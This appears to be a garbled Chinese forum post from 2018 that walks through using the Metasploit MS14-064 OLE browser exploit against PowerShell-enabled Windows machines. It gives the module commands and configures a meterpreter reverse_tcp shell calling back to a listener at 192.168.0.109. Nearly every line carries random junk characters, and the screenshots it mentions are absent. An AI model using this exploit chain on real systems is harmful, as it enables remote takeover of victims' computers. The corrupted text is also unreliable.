! Q( R+ o( b8 H) _" ?5 T# K: U 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
% L* u- n; G# a) ]9 |' ^$ Z z+ f
% J9 S( T' k; S- P& }! p4 v, {5 S1 V& L @
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
/ @ ]9 \6 C. Y8 D" y6 b. \) G
2 }' K& j: g% F2 Z( {% U
; [' N: D8 t3 x( ?; E 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
8 n# K3 M1 `0 A. k6 R5 J
; w6 o8 b n9 I+ S) l7 _5 f* i" ~7 w
' R" z l* G, I3 p- V$ Z9 y set AllowPowershellPrompt true# {$ W7 |) F) |- E2 x
* o+ I, N2 _* F. R$ H( \
. t4 q1 U" v% ^$ n
Set LHOST 192.168.0.109. R$ C' O3 n3 j2 c
* \) p8 q) s! g2 y
1 \( B+ H9 r5 b; _" T. o4 O
set SRVHOST 192.168.0.109
- U8 ~! T# N r
5 g/ ]4 s' A) W/ g+ }' o& [8 v! ?, D+ i/ e- x$ {7 }! S
Set uripath share2 w T7 L" p7 N+ P
* B# o# ?4 b) b& C( d x8 B
8 L6 \$ X0 P/ S% U' d% S Set srvport 808 ~4 z0 @- K* K: i3 ?
9 {' x: m. ?5 T& M
) I- x" A' Y. c+ a; O+ P 
8 R. J/ t$ _6 S* w1 F* {) X
* o& w7 \ K ], I7 @
, v; W- {3 j) {3 f
/ |, ?' G' |3 F: }
: T! s/ a. v7 H# ?
, G! w! S% b; Q8 ]- _+ C# W 4 R4 D4 P* N, U0 ^* S: A; R: R s1 u* r ~
6 \ [1 d) Y4 Z9 r
2 j2 h! b8 b7 r" F4 f+ ?* _. J# R, i " s% h' r$ A3 i8 b2 W g% T; b
; L# g8 d% r. F- R! W/ D
* V8 J, F. P( J5 U. X3 o * k2 ]) |( A( |: B$ Y/ X' t
8 z: T6 ~* a3 o+ q8 p! ]. @7 j3 q6 u% g4 Z& W6 n
下面我们来访问本地地址如图:
7 p* g2 s3 y6 a) `/ ]1 x/ S5 f# S( i3 M5 u
$ l C4 `6 d# i9 G" H% [+ v8 e* V3 J7 }
( l* x% k5 D, _" N0 Q# g
% o0 v$ S$ u5 J9 H3 H# z" `% q. E) I2 w( L1 d9 s; l
7 x* _4 `, t, i
$ i& F/ t" @* Y' Z$ F) S
/ @/ `7 m# b7 I4 n2 z
2 o! |; t/ [* ]' R# b1 b
发表于 2018-10-20 20:20:35
收藏
支持
反对